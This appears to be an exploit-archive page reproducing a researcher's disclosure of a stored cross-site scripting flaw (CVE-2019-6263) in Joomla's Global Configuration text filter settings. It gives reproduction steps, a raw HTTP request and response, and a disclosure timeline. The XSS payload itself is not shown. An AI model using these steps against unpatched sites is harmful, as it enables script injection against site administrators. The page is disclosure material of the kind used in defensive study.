Joomla! core 3.9.1 persistent crosssite scripting in global configuration textfilter settings Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-18 | Type : webapps | Platform : php
This exploit / vulnerability Joomla! core 3.9.1 persistent crosssite scripting in global configuration textfilter settings is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: [Joomla Global Configuration Text Filter settings Stored XSS Vulnerability]
# Date: [18/01/2019]
# Exploit Author: [Praveen Sutar] , Twitter: @praveensutar123
# Vendor Homepage: []
# Affected Versions: [Joomla versions 2.5.0 through 3.9.1]
# Tested on: [Joomla 3.9.1]
# CVE : [CVE-2019-6263]
# Vendor Advisory: []
# Author Blog: []

The Flexible Platform Empowering Website Creators. Joomla! is an award-winning content management system (CMS), which enables you to build web sites and powerful online applications.

Joomla Core - Stored XSS issue in the Global Configuration textfilter settings.

#Vulnerability Details:-

1. Joomla Core - Stored XSS issue in the Global Configuration textfilter settings (CVE-2019-6263)

Joomla failes to perform adequate checks at the Global Configuration Text Filter settings which allows a stored XSS.

1. Login to Joomla administrator console
2. Navigate to System -> Global Configuration -> Text Filters
3. Add following payload in Filter Tags2 with No HTML (Filter Type) as Public (Filter Group):


Request :
POST /administrator/index.php?option=com_config HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<target_ip>/administrator/index.php?option=com_config
Content-Type: application/x-www-form-urlencoded
Content-Length: 4303
Connection: close
Cookie: wp-settings-time-1=1540363679; 05e3b315128406acf7dd996046a180f8=__SITE__; 7bb05cf41807f1d0136fbae285e8a16c=1; 783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2
Upgrade-Insecure-Requests: 1


4. Save the Changes.
5. Navigate to Global Configuration page and an alert box will pop up. Here's the response body:

HTTP/1.1 303 See other
Date: Fri, 18 Jan 2019 07:30:48 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: /administrator/index.php?option=com_config
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Fri, 18 Jan 2019 07:30:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

#Vulnerability Disclosure Timeline:

11/2018: First email to disclose the vulnerability to Joomla.
12/2018: Vendor confirmed vulnerability.
01/2019: Vendor published advisory and released a fix.

Joomla! core 3.9.1 persistent crosssite scripting in global configuration textfilter settings

Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php

Joomla! core 3.9.1 persistent crosssite scripting in global configuration textfilter settings Vulnerability / Exploit